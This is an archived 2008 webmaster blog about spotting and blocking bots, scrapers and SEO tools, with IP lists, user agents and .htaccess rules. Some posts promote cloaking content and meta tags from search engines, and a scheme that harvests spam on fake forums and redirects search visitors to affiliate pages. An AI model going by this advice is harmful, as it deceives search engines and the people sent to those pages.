It would appear that WHO should check out the health of their computer network as something is rotten in their offices in Sri Lanka.

Friday, March 28, 2008

REBI-Shoveler Digging for Korean Search Engine

REBI-Shoveler must be easily overlooked as it's very unusual to go to a search engine and type in the user agent and get no authoritative hit from any bot hunter whatsoever. There were tons of hits from various web stat pages but nothing I could easily find that gave me any clue what in the hell this thing was.

With this little information all I knew was it came from Korea, otherwise I was stumped:

116.122.36.150 "REBI-Shoveler v0.1"
Finally I decided to see if I could find any more clues in the several years of bot tracking archive files I keep and sure enough, there was a single original hit on my server that contained the answer I was looking for:
116.122.36.48
"REBI-Shoveler/RS Ver. -100.0 (REBI's great worker ... ; http://rebi.co.kr; deisys@rebi.co.kr)"
This bot operates out of multiple IPs in the range of 116.122.36.* and here's a little translation for you from their site about REBI, but not mention about robots.txt nor did it ask for the file when it visited my site today, so it's behaving badly.

Now you know who REBI is that's shoveling shit off of your server.

Enjoy.

We'll Have Anon Of That, John Doe Must Go

Looks like JonDonym - the internet anonymisation service is actively operating as those little anonymous hits are coming from their servers.

I have a couple of actual scrapes happening from their IPs, who would suspect abuse of anon proxies, right?

Here's a couple of examples of activity:

141.76.45.34 [proxy1.anon-online.org.]
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13

141.76.45.35 [proxy2.anon-online.org.]
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13

Don't know what other IPs it operates from but 141.76.45.* and anything resolving to anon-online.org are blocked for now.

Good luck with your John Doe anonymity while I work on my taxes as you've just been H&R Blocked!

With tax deadlines close at hand I couldn't resist ;)

Monday, March 24, 2008

Please Install Flash - Idiots Guide To Flash Web Stupidity

Time to rant about a big pet peeve of mine, that little line of javascript that detects whether or not Flash is installed and the stupid shit developers do when it fails.

For a little introduction to the problem, I run Firefox with NoScript enabled globally for security purposes. However, I can easily enable javascript with a click except some developers do some really stupid shit that's costing their clients visitors.

Here's a few brain dead examples of Flash sites done wrong in the hands of idiots:

1. When javascript is disabled a blank page often results without even a hint, looks broken, visitors go away thinking you're stupid as dirt for putting up a blank page.

2. Redirecting visitors to a "Please Download Flash" page is just asinine. When visitors then enable javascript so your flash will work we're off on some other stupid page instead of where we wanted to go. Yup, frustrate your visitors and they'll just go elsewhere where sites aren't developed by designers that rode the short yellow bus to VoTech.

3. Using the NOSCRIPT tag to incorrectly tell us we don't have Flash installed because that tag actually means we have javascript disabled and you have no fucking clue if we have Flash installed or not until we turn on javascript you fucking idiots. Tell us correctly to ENABLE JAVASCRIPT to run the site in your NOSCRIPT tag and then let the javascript tell us we don't have Flash installed.

I'm sure I'll have some other addendums later but these are the top 3 offending things moronic Flash site developers do off the top of my head.

Anyone else got a pet Flash peeve?

Friday, March 14, 2008

SearchMe Demos Wicked Cool Visual Search Engine

Looks like I was right on the money back in Oct '07 when I announced that I had spotted SearchMe taking screen shots on one of my sites and I knew this was a hot news item but couldn't get the Sphinners to bite on it.

Here we are 6 months later and the story broke a couple of days ago on the Silicon Valley WebGuild:

Searchme is a new search engine that captures images of web pages and allows users to navigate visually through these page snapshots.
Searchme is currently running a private beta but the flash demo on their web site is real fucking cool so I hope their search technology is as good because this is so wicked it could be a real Google killer.



I'll bet Microsoft, Yahoo or Ask tries to buy this technology ASAP before Google can get their hands on it as something this hot could put any of the lesser search engines back on the map.

If you want information about their spider named Charlotte and IP addresses so you can let Searchme into your site and past your firewall, read my previous post with all the pertinent information.

Wednesday, March 12, 2008

Welcome to Opt-In Web 3.0 Politeness

This summary is not available. Please click here to view the post.

Sunday, March 09, 2008

Gone Fishkin With More SEOMoz Tool Activity

In my continue series of exposing SEO tools we find this little SEOmoz-bot over at SEOmoz.

I'll give SEOmoz some credit where credit is due in they at least identify their tool as a bot so it can be blocked if you want. However, they don't check robots.txt to see if the bot is allowed as I think they assume it's always going to be used by the site owner but it could just as easily be used on some competitor's site as well.

Here are the IPs and the user agent used:

209.40.115.202 "SEOmoz-bot"
209.40.116.200 "SEOmoz-bot"
The IP's belong to HopOne which provides various services including hosting.
OrgName: HopOne Internet Corporation
NetName: HOPONE-DCA2-4
NetRange: 209.40.96.0 - 209.40.127.255
I think that range is safe to block as it appears they use 'DC' in the net name of their data centers but it's probably worth checking to see what bounces for a few days to make sure.

Of course the best SEO is secure SEO, so block 'em ;)

Smack the SMILE SEO TOOLS Off Your Face

Some spamming assholes in Russia think automatic directory submission is the same as SEO and added one of my sites to their so called SMILE SEO TOOLS.

Here's a list of the various user agents I've seen claiming to be this tool:

"SMILESEOTools"
"SMILE SEO Tools"
"SMILESEOTools(Windows;compatible;MSIE6.0;I;WindowsNT5.0)"
The last user agent with an extremely lame ass attempt to mimic MSIE 6 gave me a good giggle.

Here's the list of IP's using this directory spamware, probably mostly proxy sites in Russia would be my guess as they have a ton of proxy sites for spamming over there.

Yes, 114 lovely IP's using SMILE SEO Tools for your veiwing pleasure:
217.20.168.113
217.151.225.42
213.247.143.205
213.232.196.102
213.184.238.34
213.170.69.66
212.96.222.197
212.96.200.33
212.96.200.115
212.59.98.125
212.220.104.230
204.15.76.250
201.12.176.18
195.91.168.193
195.72.145.7
195.72.142.106
195.46.188.3
195.239.202.65
195.234.114.122
195.234.109.71
195.218.220.26
195.162.39.54
195.131.84.202
195.131.188.138
195.122.250.205
194.44.191.7
194.24.240.23
193.239.255.22
193.238.96.5
193.17.174.7
91.77.38.45
91.76.44.134
91.76.34.0
91.76.159.205
91.76.156.161
91.76.111.247
91.76.108.170
91.124.75.182
91.124.35.208
91.124.245.129
91.124.232.195
91.124.165.97
91.124.143.254
91.122.51.213
90.188.71.41
89.250.2.129
89.19.164.14
89.179.97.170
89.179.96.253
89.179.110.182
89.179.103.190
89.178.209.180
89.178.143.161
87.240.15.33
87.240.15.26
87.237.113.6
87.117.35.56
87.117.33.5
86.57.220.142
85.94.34.227
85.238.106.44
85.238.106.35
85.236.26.202
85.192.165.43
85.141.228.16
85.141.213.13
85.140.58.175
85.140.54.95
85.140.53.21
85.140.52.233
85.140.154.97
85.140.118.4
85.140.117.215
85.140.116.105
84.42.57.72
84.253.75.67
84.154.102.78
83.237.96.4
83.237.76.106
83.237.211.116
83.237.200.54
83.237.186.74
83.237.169.118
83.167.116.85
83.167.112.224
82.207.36.70
82.207.14.51
82.207.117.186
82.207.0.248
81.95.178.185
81.94.22.114
81.3.158.138
81.25.53.49
81.200.7.88
80.92.96.7
80.80.111.240
80.248.156.79
78.106.58.185
78.106.189.47
77.247.172.250
77.247.165.196
77.247.165.14
77.247.160.89
77.239.192.6
77.235.113.131
77.235.101.11
77.123.62.125
77.122.231.9
74.232.4.137
62.33.7.146
62.213.18.70
62.168.234.78
62.140.244.20
62.118.2.146
Just to help you understand where these IP's were coming from, here's the reverse DNS of the same list:
ppp91-77-38-45.pppoe.mtu-net.ru.
ppp91-76-44-134.pppoe.mtu-net.ru.
ppp91-76-34-0.pppoe.mtu-net.ru.
ppp91-76-159-205.pppoe.mtu-net.ru.
ppp91-76-156-161.pppoe.mtu-net.ru.
ppp91-76-111-247.pppoe.mtu-net.ru.
ppp91-76-108-170.pppoe.mtu-net.ru.
182-75-124-91.pool.ukrtel.net.
208-35-124-91.pool.ukrtel.net.
129-245-124-91.pool.ukrtel.net.
195-232-124-91.pool.ukrtel.net.
97-165-124-91.pool.ukrtel.net.
254-143-124-91.pool.ukrtel.net.
ppp91-122-51-213.pppoe.avangarddsl.ru.
41.71.188.90.adsl.tomsknet.ru.
nat.tushino.com.
hst14-nat.n.tc-exe.ru.
89-179-97-170.broadband.corbina.ru.
89-179-96-253.broadband.corbina.ru.
89-179-110-182.broadband.corbina.ru.
89-179-103-190.broadband.corbina.ru.
89-178-209-180.broadband.corbina.ru.
89-178-143-161.broadband.corbina.ru.
nat.a10.qwerty.ru.
nat1.a3.qwerty.ru.
6-113.admiral.tvoe.tv.
Host 56.35.117.87.in-addr.arpa not found: 3(NXDOMAIN)
5.33.117.87.donpac.ru.
220-142.pppoe.vitebsk.by.
85.94.34.227.adsl.sta.mcn.ru.
85-238-106-44.broadband.tenet.odessa.ua.
85-238-106-35.broadband.tenet.odessa.ua.
Host 202.26.236.85.in-addr.arpa not found: 3(NXDOMAIN)
85-192-165-43.dsl.esoo.ru.
ppp85-141-228-16.pppoe.mtu-net.ru.
ppp85-141-213-13.pppoe.mtu-net.ru.
ppp85-140-58-175.pppoe.mtu-net.ru.
ppp85-140-54-95.pppoe.mtu-net.ru.
ppp85-140-53-21.pppoe.mtu-net.ru.
ppp85-140-52-233.pppoe.mtu-net.ru.
ppp85-140-154-97.pppoe.mtu-net.ru.
ppp85-140-118-4.pppoe.mtu-net.ru.
ppp85-140-117-215.pppoe.mtu-net.ru.
ppp85-140-116-105.pppoe.mtu-net.ru.
Host 72.57.42.84.in-addr.arpa not found: 3(NXDOMAIN)
client1-3.amtelsvyaz.ru.
p549A664E.dip.t-dialin.net.
ppp83-237-96-4.pppoe.mtu-net.ru.
all-seminars.ru.
ppp83-237-211-116.pppoe.mtu-net.ru.
ppp83-237-200-54.pppoe.mtu-net.ru.
ppp83-237-186-74.pppoe.mtu-net.ru.
ppp83-237-169-118.pppoe.mtu-net.ru.
n116h85.catv.ext.ru.
n112h224.catv.ext.ru.
Host 70.36.207.82.in-addr.arpa not found: 3(NXDOMAIN)
pool-2user51.dc.ukrtel.net.
us.com.ua.
Host 248.0.207.82.in-addr.arpa not found: 3(NXDOMAIN)
185.178.95.81.in-addr.arpa turnskin.kiev.ua.
185.178.95.81.in-addr.arpa werewolf.kiev.ua.
185.178.95.81.in-addr.arpa filippova.kiev.ua.
185.178.95.81.in-addr.arpa rogovskiy.kiev.ua.
185.178.95.81.in-addr.arpa rogovskaya.kiev.ua.
185.178.95.81.in-addr.arpa prudaev.kiev.ua.
185.178.95.81.in-addr.arpa filippov.kiev.ua.
114.22.94.81.in-addr.arpa vpnpool-81-94-22-114.users.mns.ru.
Host 138.158.3.81.in-addr.arpa not found: 3(NXDOMAIN)
49.53.25.81.in-addr.arpa NAT-81-25-53-49.ultranet.ru.
Host 88.7.200.81.in-addr.arpa not found: 2(SERVFAIL)
7.96.92.80.in-addr.arpa gw7.eth.zelcom.ru.
240.111.80.80.in-addr.arpa ce2-ats32.aaanet.ru.
Host 79.156.248.80.in-addr.arpa not found: 3(NXDOMAIN)
185.58.106.78.in-addr.arpa 78-106-58-185.broadband.corbina.ru.
47.189.106.78.in-addr.arpa 78-106-189-47.broadband.corbina.ru.
Host 250.172.247.77.in-addr.arpa not found: 3(NXDOMAIN)
Host 196.165.247.77.in-addr.arpa not found: 3(NXDOMAIN)
Host 14.165.247.77.in-addr.arpa not found: 3(NXDOMAIN)
Host 89.160.247.77.in-addr.arpa not found: 3(NXDOMAIN)
6.192.239.77.in-addr.arpa libra.comintel.ru.
131.113.235.77.in-addr.arpa 131.113.235.77.dyn.idknet.com.
11.101.235.77.in-addr.arpa 11.101.235.77.dyn.idknet.com.
125.62.123.77.in-addr.arpa unshaven.yawner.volia.net.
9.231.122.77.in-addr.arpa gearing.butter.volia.net.
137.4.232.74.in-addr.arpa adsl-232-4-137.asm.bellsouth.net.
146.7.33.62.in-addr.arpa gw.quaynet.ru.
70.18.213.62.in-addr.arpa h62-213-18-70.ip.syzran.ru.
78.234.168.62.in-addr.arpa virtual-234-78.utk.ru.
20.244.140.62.in-addr.arpa nat3.birulevo.net.
Host 146.2.118.62.in-addr.arpa not found: 3(NXDOMAIN)
113.168.20.217.in-addr.arpa mediainfotour-gw.cs1-nan.kv.wnet.ua.
;; reply from unexpected source: 72.51.32.76#53, expected 72.51.32.92#53
;; Warning: ID mismatch: expected ID 10615, got 39356
;; reply from unexpected source: 72.51.32.76#53, expected 72.51.32.92#53
;; Warning: ID mismatch: expected ID 10615, got 39356
;; connection timed out; no servers could be reached
205.143.247.213.in-addr.arpa is an alias for 205.192.143.247.213.in-addr.arpa.
205.192.143.247.213.in-addr.arpa host-205.SPM.213.247.143.192.0xfffffff0.macomnet.net.
102.196.232.213.in-addr.arpa host.hnt.ru.
34.238.184.213.in-addr.arpa 34-nat.cosmostv.by.
66.69.170.213.in-addr.arpa relay.volex.spb.ru.
Host 197.222.96.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 33.200.96.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 115.200.96.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 125.98.59.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 230.104.220.212.in-addr.arpa not found: 3(NXDOMAIN)
250.76.15.204.in-addr.arpa elanora.aatikah.com.
18.176.12.201.in-addr.arpa 201-12-176-18.intelignet.com.br.
193.168.91.195.in-addr.arpa h195-91-168-193.ln.rinet.ru.
7.145.72.195.in-addr.arpa user-195.72.145.7.lvivnet.org.
106.142.72.195.in-addr.arpa gw.itstime.ru.
3.188.46.195.in-addr.arpa ts1-b3.Irkutsk.dial.rol.ru.
65.202.239.195.in-addr.arpa ts1-a65.Irkutsk.dial.rol.ru.
122.114.234.195.in-addr.arpa 195.234.114.122.ukrlink.net.ua.
;; connection timed out; no servers could be reached
26.220.218.195.in-addr.arpa adsl-stat-0534.comch.ru.
Host 54.39.162.195.in-addr.arpa not found: 3(NXDOMAIN)
202.84.131.195.in-addr.arpa cache.wplus.net.
Host 138.188.131.195.in-addr.arpa not found: 3(NXDOMAIN)
205.250.122.195.in-addr.arpa 205.250.nat.smilenet.sandy.ru.
7.191.44.194.in-addr.arpa mail2.complex.lviv.ua.
23.240.24.194.in-addr.arpa 23.240.dsl.westcall.net.
Host 22.255.239.193.in-addr.arpa not found: 3(NXDOMAIN)
5.96.238.193.in-addr.arpa nat.itt.net.ua.
7.174.17.193.in-addr.arpa pptp-out2.radiokom.kr.ua
Well, doesn't that really sum it up well?

Enjoy the list, block 'em if you want.

Heck, just block the entire country of Russia and the Ukraine entirely and hide the children in your bomb shelter just in case they get pissed.

More Pesky SEO Tools To Block

Seems there is something in Germany called SEO.AG that has been pestering my site for quite some time.

The IP and User Agent it uses is:

85.214.35.2 "SEO[.AG] - Search Engine Optimizer Bot [http://www.seo.ag]"
However, they also run a web proxy on 85.214.35.2 so you have to block the IP to stop all the nonsense.

I'm not sure which is worse, the scrapers, proxies, aggrators, or the SEOs and their tools.

You Know You Drink Too Much When...

When you wake up face down in a pizza you know you got mad drinking skills, especially when you went face down in mid-bite of the pizza.

When you wake up and your pillow is covered in pizza vomit, that's madder skills cause you didn't die in your sleep aspirating on pizza vomit. Having to shave your beard off because you can't seem to wash out all the partially digested bits of pizza is a bit embarrassing. However, having the side of your face that laid on the pizza sauce all night get stained and looking bright red all day is priceless.

When you wake up under your bed, realize you're on cold hard wood, bump your head on wood when you try to get up and suddenly panic thinking you're in a coffin because it's all wood and you can't get up, you've truly arrived.

When leaving a party and the elevator makes your stomach flip-flop you panic as the doors open and vomit down the crack between the elevator and the wall and spew into the elevator shaft just because there's no where else to suddenly yak, you're working your way to be an AA superstar!

When you're leaving a party and have no other place than to barf in a water fountain in the lobby of an apartment complex and as you're leaving giggle as you hear people walk up to take a drink screaming, you're in the club!

When you barf up brightly colored red nacho chips and suddenly panic thinking your stomach is bleeding profusely until you remember what you ate .... and then drink too much and barf a couple of nights later just to make sure that's what it really was.

When you and your friends are out partying all night and you suddenly fill up the floor of the car with vomit and 6 of your friends bail out the window just to get away from you

You know your friends are all alkies too when the topic of conversation is always which one of you wussies is going to drop a street pizza or a technicolor yawn first

Another clue your friends have drinking problems is when they fall out of the car when they open the door

A clue something bad happened is when you wake up on a sofa in a house you don't remember, find your glasses in your pocket and when you put them on can't see thru the thick film of dry vomit that's encrusted them

FINALLY, last but not least, you know it's time to stop drinking when you wake up and flies are picking the vomit out of your nose.

What Time Is It Anyway?

Got up this morning and all the computers and TV's said it was 9:00am but the phones and alarm clocks said it was 8:00am.

Obviously this was the daylight savings bullshit gone bad but how in the hell could someone fuck up the atomic time clock which the alarms and phones feed from?

Had this been an actual day when I really needed to get up and be somewhere by 8am I would've been fucked since both the alarm clock and the alarm in the phone, which I prefer because it's louder, would've both malfunctioned.

Anyway, around 11:00am everything was back in synch.

Don't you just love fucking daylight savings time?

Blech.

There Goes the Bad Neighborhood

Isn't it ironic that a day after I wrote about stopping snooping SEO tool's here comes one of them trying to crawl one of my websites.

The user agent and IP address are:

208.77.208.198 [emeraldarborvitae.viviotech.net.]
"Bad-Neighborhood Link Analyzer (http://www.bad-neighborhood.com/)"
They were automatically blocked on my site because I white list only allowed user agents and they use an unauthorized user agent name, but they could always switch to mimic a browser so in the long run it's best to block the IP range.

Turns out Viviotech is the host of Bad Neighborhood's site:
OrgName: Vivio Technologies
NetRange: 208.77.208.0 - 208.77.211.255
CIDR: 208.77.208.0/22
After you block this data center range the tools from Bad Neighborhood can't be used to scan your site, check your Apache server headers, or any other thing.

Sorry, but you're not allowed back into my neighborhood.

Buh bye.

Saturday, March 08, 2008

Jayde NicheBot Crawls for iEntry's Web of Sites

Who out there remembers the Jayde directory?

Some of us submitted our sites to Jayde way back in '96 or '97, who knows exactly, and now our sites are being hit by something called the "Jayde NicheBot".

"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) Jayde NicheBot"
I was curious why some site I submitted to about 10 years ago was pinging my server all these years later so I did a little research to see what they'd been up to in the interim and they appear to have been very prolific, almost to domain park proportions.

Jayde is currently owned by iEntry.com and if you have McAfee SiteAdvisor enabled in your browser it goes RED meaning that iEntry has something negative on file with SiteAdvisor that says the following:
Feedback from credible users suggests that this site sends either high volume or 'spammy' e-mails.
Took a look and found someone that posted one of those 'spammy emails' with a ton of iEntry's domain names listed.

On iEntry's website they claim:
iEntry properties include more than 370 Web sites and over 100 e-mail newsletters that are viewed by more than 5 million users every month.
Did a quick search for their 370 sites and Yahoo finds over 170 of them.

It appears iEntry owns ExactSeek.com, sitepronews.com, webpronews.com, metawebsearch.com, seo-news.com (and forum), and a ton of directories, bunch of sites here, shitload of sites there, and last but not least here it's tied together with ISEDN.ORG

Google and Yahoo could find listings about my sites in a bunch of their directories which begs the question:

Why does Google and Yahoo index all those redundant directories?

I found references to my sites in about 40 of them, there's a shock, knock me over with a feather. About 40 sites was all Google and Yahoo would easily report, and the answer to the "why are they indexed?" question appears to be that the order of the listings in the directory are changed for the same content on a different site so it seems to be unique per directory as far as the search engines are concerned. Maybe there were other changes as well, I didn't look to deep.

However, I did check Live search which doesn't appear to be so gullible as it only reported the duplicate content in 5 sites.

Hey, submit your link, it's FREE and you can advertise too!

Hope I didn't blow out anyone's sarcasm meter with that last quip.

Friday, March 07, 2008

Slow Down Nosy SEO's and Snooping Competitors

Most webmasters spend a lot of time and effort working on marketing their website, or pay someone a lot of money to do this, yet don't do a few common sense things that keep lazy and nosy assed SEO's or other competitors from quickly analyzing all your hard work and simply stealing what you've done.

Not that you can completely stop them because much of the competitive information about who links to you is already public, collected by search engines and toolbars, but you can sure as hell make it a little more difficult to get the rest of the data they want.

Since the SEO Chicks published a list of competitive research tools to help those nosy SEO's snoop, I just thought it would be fair and useful to have a nice list of ways to stop as many of those those snooper tools as possible.

Block Archive.org - No need to let anyone see how your site evolved, snoop or even scrape through archive pages without your knowledge so block their crawler.

User-agent: ia_archiver
Disallow: /
Rumor has it that the ia_archiver may crawl your site anyway so adding it to your .htaccess file is a good precaution as well.
RewriteCond %{HTTP_USER_AGENT} ^ia_archive
RewriteRule ^.* - [F,L]
Block Search Engine Cache - Some people cloak pages and just show the search engines raw text yet show the visitors a complete page layout. Who cares, that's your business and a competitive edge you don't need to share, plus pages can be scraped from search engine cache as well, so disable cache on all pages.

Insert the following meta tag in the top of all your web pages:
<meta content='NOARCHIVE' name='ROBOTS'>
Block Xenu Link Sleuth - Why do you need people sleuthing your site? Screw 'em...

Add Xenu to your .htaccess file as well:
RewriteCond %{HTTP_USER_AGENT} ^ia_archive [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xenu
RewriteRule ^.* - [F,L]
Make Your Domain Registration Private - Why give the SEO's or any other competitor any clues to help them whatsoever?

Sign up with DomainsByProxy and this will make the nosy little bastards happy:
WHATEVERMYDOMAINNAME.COM
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
Restrict Access To Unauthorized Tools - Use .htaccess to white list access to your site and just allow the major search engines and the most popular browsers which will block many other SEO tools. If you don't understand the white list method and it scares you, there's a few good black lists around too.

This is a limited sample for informational purposes only just to give an idea how it works, see the thread linked above for more in depth samples by WebSavvy, just be cautious in implementing a white list as it's very restrictive:
#allow just search engines we like, we're OPT-IN only

#a catch-all for Google
BrowserMatchNoCase Google good_pass

#a couple for Yahoo
BrowserMatchNoCase Slurp good_pass
BrowserMatchNoCase Yahoo-MMCrawler good_pass

#looks like all MSN starts with MSN or Sand
BrowserMatchNoCase ^msnbot good_pass
BrowserMatchNoCase SandCrawler good_pass

#don't forget ASK/Teoma
BrowserMatchNoCase Teoma good_pass
BrowserMatchNoCase Jeeves good_pass

#allow Firefox, MSIE, Opera etc., will punt Lynx, cell phones and PDAs, don't care
BrowserMatchNoCase ^Mozilla good_pass
BrowserMatchNoCase ^Opera good_pass

#Let just the good guys in, punt everyone else to the curb
#which includes blank user agents as well


order deny,allow
deny from all
allow from env=good_pass

Disclaimer: I don't use .htaccess for much so please don't ask for a complete file, this is just a sample as I use a more complex real-time PHP script to control access to my site.

Block Bots and Speeding Crawlers
- You can use something like the nifty PHP bot speed trap Alex Kemp has written or Robert Planks AntiCrawl. Just another layer of security piled on against snoops and scrapers that pretend to be MSIE or Firefox to avoid the white list or black list blocking in .htaccess.

Block Snoops From Robots.txt - Don't allow anyone other that your white listed bots to see your robots.txt file because it has other stuff in it that SEO snoops might find interesting, and it can become a security risk. Use a dynamic robots.txt file like this perl script on WebmasterWorld and just add the rest of your allowed bots to the code next to Slurp, Googlebot, etc.

Block DomainTools - since SEO's use it to snoop, no reason to let DomainTools have access so just block 'em.

Probably lot's of other things you should be blocking as well but this will give you a good start.

This list doesn't completely stop snoops from manually looking at your site, but it certainly stops all of those automated tools from ripping through all your pages, search engine or archive cache, and presenting a nice pretty report.

Heck, why should you help people take away your own money?

Start slowing them down today and stop the next up and comer from getting the info too easy.

UPDATE:

One more creative thing you can do to your website is cloak the meta tags so that only the search engines see them and disable the meta tags for normal visitors. Nothing really wrong with this because meta tags by definition are only for the search engines and snooping SEO's will be completely left in the dark when they can't see your meta keywords or description.

Especially if you combine cloaking meta tags with the NOARCHIVE option described above so then it's completely hidden from prying eyes.













Monday, February 18, 2008

Hakia Search Engine Spotted?

Hakia has been advertising their search engine in beta for quite some time and the only thing I've ever seen from them hitting my server is the following sporadic log entries:

06/28/2007 204.14.209.51 "Mozilla/4.0+"
10/05/2007 204.14.209.51 "Mozilla/4.0+"
11/09/2007 204.14.209.51 "Mozilla/4.0+"
12/19/2007 204.14.209.51 "Mozilla/4.0+"
02/18/2008 204.14.209.51 "Mozilla/4.0+"
Whatever it is didn't ask for robots.txt.

Here's their IP range:
HAKIA INC. IP00095 (NET-204-14-209-0-1)
204.14.209.0 - 204.14.209.255
Maybe someone knows more about this but I can't really find any information on them crawling and didn't notice anything on their site about them having a spider.

Thursday, February 14, 2008

MSIE 7 on Livebot IPs

Not sure what this means but I spotted an MSIE 7.0 user agent on the following Livebot IP addresses.

Here's the exact agent used:

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)
Here's the IPs involved:
65.55.165.119 [livebot-65-55-165-119.search.live.com.]
65.55.165.38 [livebot-65-55-165-38.search.live.com.]
65.55.165.53 [livebot-65-55-165-53.search.live.com.]
65.55.165.66 [livebot-65-55-165-66.search.live.com.]
65.55.165.96 [livebot-65-55-165-96.search.live.com.]
Could mean anything from Live testing who has rigid user agent checking to making screen shots or they're reusing those IPs for other internal purposes, hard to say.

What's not hard to say is that those IPs with that user agent got automatically blocked on my site for being the wrong thing in the wrong place.

Tuesday, February 12, 2008

Jazztel Scraping Hotzone

Found a hotzone of activity from jazztel.es which has been attempting to scrape like crazy since the first of the year. Obviously they didn't get very far but keep trying and trying and I looked at the acitivity and it's definitely a bot running on 87.218.70.*

Here's the number of attempted pages per IP:

785 - 87.218.70.251
661 - 87.218.70.231
630 - 87.218.70.41
346 - 87.218.70.120
336 - 87.218.70.196
334 - 87.218.70.12
334 - 87.218.70.100
333 - 87.218.70.135
329 - 87.218.70.203
328 - 87.218.70.107
283 - 87.218.70.178
199 - 87.218.70.174
So it's probably a good idea to block 87.218.70.* just to be safe.

Wednesday, January 30, 2008

Make Money With a Black Hat Honeypot

Instead of trying to fight forum, blog and wiki spam it finally dawned on me that I was taking the wrong approach, don't fight the Black Hat spammers, monetize them!

The basic concept is built around the black hat spammers love of spamming so the first thing you need to do is set up a bunch of fake forums, blogs and wiki's using the popular open source software that the spammers love most. The trick is NOT to install any form of spam controls whatsoever, no captcha, no Askimet, nothing that will slow the spammer down. Let the spammers go wild with your honeypot site and let them make fake profiles, create spam threads and comments, it doesn't matter because we call all this spam "content" for this purpose.

For those advanced webmasters, take a look at some automatic content creation techniques that you can use to prime the honeypot sites with hundreds of bogus threads and blog posts of gibberish. This will trick the spammers into thinking you have a popular site where there will be lots of eyeballs looking at their spam yet nothing could be further from the truth as nobody will ever see their spam. If you want to be truly creative, use the text jumble or synonym switch on each spammers post to avoid duplicate content and also avoid matching their spam footprint which could be easily detected.

Right about now you must be asking yourself:
"Why in the hell would I build a site designed to be spammed?"

The answer is simple, the spam will become your content and hopefully your honeypot sites will pick up some traffic from the search engines. Best of all, the spammers will keep hitting your site daily so you'll have fresh content and we know how the search engines just love fresh content.

Once you get this traffic from the search engine, simply redirect that traffic to the appropriate affiliate landing page based on the search keyword and VOILA! you start making sales and the free money starts rolling in with the spammers doing all the work.

So there you have a simple yet elegant solution in one neat little bundle to let spammers make you money while you screw them over wasting their time spamming your honeypot sites.

Enjoy.

Very Bad Behavior for Crashed Joomla! Sites

Which is worse, a little spam or being offline for a month?

A major example shown below is because the bot blocker can crash the whole site and this poor webmaster has been in this state at a minimum, according to Google cache, since "retrieved on Jan 24, 2008". However, Live says the same site has been this way since "our crawler examined the site on 1/11/2008", so it's much worse.

Then I found another site down all month as Google cache shows "retrieved on Jan 2, 2008" so they've not only had anti-spam but anti-visitor as well, nothing to worry about.

Warning: botbehavior_bot() [function.botbehavior-bot]: SAFE MODE Restriction in effect. The script whose uid is 3647 is not allowed to access /home/xxx/public_html/mambots/system/bad-behavior/bad-behavior-joomla.php owned by uid 80 in /home/xxx/public_html/mambots/system/bb2_bot.php22

Warning:botbehavior_bot(/home/xxx/public_html/mambots/system/bad-behavior/bad-behavior-joomla.php) [function.botbehavior-bot]: failed to open stream: Unknown error: 0 in /home/xxx/public_html/mambots/system/bb2_bot.php on line 22

Fatal error: botbehavior_bot() [function.require]: Failed opening required '/home/xxx/public_html/mambots/system/bad-behavior/bad-behavior-joomla.php' (include_path='.:/usr/local/lib/php-4.4.7/lib/php') in /home/xxx/public_html/mambots/system/bb2_bot.php on line 22

Looked around the web and there are other Joomla! sites with similar issues as well which weren't completely fatal. I'm not sure why a few sites just crashed with the errors while others proceeded to display errors with page content.

All I can say is that these webmasters need a good site monitoring alarm service at a minimum.

Saturday, January 26, 2008

Yahoo Slurp Using New IPs

Yesterday my bot blocker notified me of a new range of IPs being used by Slurp that I haven't seen before.

This is a prime example of why I keep telling people that still use IP checking only to update their code and use full trip DNS checking to validate major search engines to avoid bouncing spiders with new IPs but people just don't listen.

Hope the following helps for anyone still validating Slurp by IP only.

The user agent:

"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
A few reverse DNS samples:
67.195.44.83 [lm302008.crawl.yahoo.net.]
67.195.44.80 [lm302005.crawl.yahoo.net.]
67.195.44.84 [lm302009.crawl.yahoo.net.]
67.195.44.103 [lm302028.crawl.yahoo.net.]
67.195.44.100 [lm302025.crawl.yahoo.net.]
67.195.44.96 [lm302021.crawl.yahoo.net.]
67.195.44.99 [lm302024.crawl.yahoo.net.]
67.195.44.92 [lm302017.crawl.yahoo.net.]
The complete list of new IPs Slurp used:
67.195.44.100
67.195.44.101
67.195.44.102
67.195.44.103
67.195.44.109
67.195.44.75
67.195.44.76
67.195.44.77
67.195.44.78
67.195.44.79
67.195.44.80
67.195.44.81
67.195.44.82
67.195.44.83
67.195.44.84
67.195.44.85
67.195.44.86
67.195.44.87
67.195.44.89
67.195.44.90
67.195.44.91
67.195.44.92
67.195.44.93
67.195.44.94
67.195.44.95
67.195.44.96
67.195.44.97
67.195.44.98
67.195.44.99

Apollo Hosting Shared Server Customers Appear To Be Hacked

One of my websites is a directory and when I last ran my link checker about 10 days ago, to validate that the sites were all still valid, several of them triggered a test that I installed to check for hacked sites. After doing a little bit of research they all turned out the be hosted on Apollo Hosting.

What I found were very large blocks of ads embedded in the home page of each compromised site for every kind of pharma product you've ever seen spammed with their links pointing to landing pages on multiple compromised servers including several universities. Some of the landing pages are also hosted on Apollo Hosting so they are being used to host both the hackers pharma links and pharma landing pages.

Took a quick look in Google and found a lot of references in Google about individual sites on Apollo being hacked but I don't think they know the extent of the problem.

Please note that these types of hackers don't seem infect every account on the server, they just infect a chunk of them based on some unknown criteria, so it's hit and miss which domains are infected. Perhaps individual accounts were hacked but I don't think so as I've seen this same type of thing on iPowerWeb (which now appears cleaned up), random sites, some servers had more sites infected, others just a few, who knows why.

Here's a few examples, view the HTML source to see all the embedded pharma ads typically at the bottom of the page:

Caution: disable javascript before you go to any domain

Server: secure1.apollohosting.com
